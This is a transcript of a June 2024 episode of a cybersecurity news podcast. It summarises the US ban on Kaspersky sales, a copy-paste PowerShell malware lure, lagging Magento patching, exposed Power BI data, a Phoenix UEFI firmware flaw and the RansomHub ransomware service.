U.S. to ban the sale of Kaspersky products to consumers and businesses.
Welcome to Cyber Security Today. It’s Friday June 21st, 2024. I’m Howard Solomon, contributing reporter on cybersecurity for TechNewsday.com.
Several countries including the U.S. and Canada have forbidden government departments from using Kaspersky cybersecurity products because the company is headquartered in Russia. On Thursday the U.S. went one step further. It said Kaspersky won’t be able to sell new licences to American residents and businesses starting July 20th or deliver updates starting Sept. 29th. Reuters quoted Commerce Secretary Gina Raimondo saying Russia’s influence over the company is a significant risk to the U.S. Kaspersky says it has no ties to the Russian government.
Gullible employees are cutting and pasting malware into their organization’s IT systems. That’s according to researchers at Proofpoint. The tactic created by a threat actor works like this: Employees get a popup text box on their screens saying an error has occurred when they try to open an email attachment or a web page. The popup tells them to hit a button to copy and paste a script into a PowerShell terminal or a Windows Run dialog box. The instruction may say the code is a new root certificate, or just a software fix. Unknown to the employee, the script triggers malware. One way this attack is delivered is by employees falling for fake browser updates that compromise their browsers. This tactic can be blunted by regularly reminding employees not to follow instructions in popup boxes. Staff must also be reminded to follow only the approved way to update any software, including browsers.
E-commerce sites using Adobe Commerce or Magento appear to be slow patching a critical vulnerability. That’s according to researchers at Sansec. They report that seven days after Adobe issued a patch only 25 per cent of online sites it checked had installed the update. One reason the number is so low: The fix may break the website’s customer checkout function. Sansec says that if an IT administrator can’t upgrade their platform at the very least make sure any Linux servers running Adobe Commerce or Magento are patched. There is also a string that can be added to the website code that will help.
Organizations that allow employees to create reports using Microsoft’s Power BI are being warned of a potential vulnerability. Power BI is a data visualization tool for creating and publishing reports. But researchers at Nokod Security say the underlying raw corporate or personal data can be accessed in Power BI reports. Depending on the organization’s security risk model, that may be okay for internally published reports. But it’s not if the report can be accessed by anyone over the internet. Nokod Security says that a simple internet search string found over 160,000 Power BI reports that are open to the web. Microsoft told the researchers the ability to access raw data is a product feature. That means its up to organizations to make sure reports created with Power BI are protected.
Desktop administrators with PCs running Intel Core processors should be watching for firmware updates from the computers’ manufacturers. Researchers at Eclypsium say there’s a serious vulnerability in the PCs that use the Phoenix SecureCore UEFI firmware. The vulnerability allows a local attacker to escalate access privileges. In other words, it’s a firmware backdoor. Last month Lenovo published BIOS updates for affected computers and other manufacturers will likely follow. Other firmware backdoors that security pros may be familiar with are BlackLotus, CosmicStrand and MosaicRegressor. Those who build their own computers with Intel Core processors and motherboards with Phoenix firmware should investigate their options.
Finally, a new background report on RansomHub has been released for defenders. This a new ransomware-as-a-service platform offered to crooks. According to researchers at Recorded Future, the gang behind this service has created versions that can exploit Windows, Linux and VMware ESXi servers. To attract affiliates to use their platform RansomHub promises to give them 90 per cent of any funds victim organizations pay to get their data back.
Late tonight the Week in Review edition of the podcast will be available. Guest commentator David Shipley of Beauceron Security and I will discuss the hack of an organization that went undetected for perhaps three years, more detail on Snowflake attacks and allegations by Australia’s privacy commissioner into what caused a huge data breach of a medical insurance provider.
Follow Cyber Security Today on Apple Podcasts, Spotify or add us to your Flash Briefing on your smart speaker.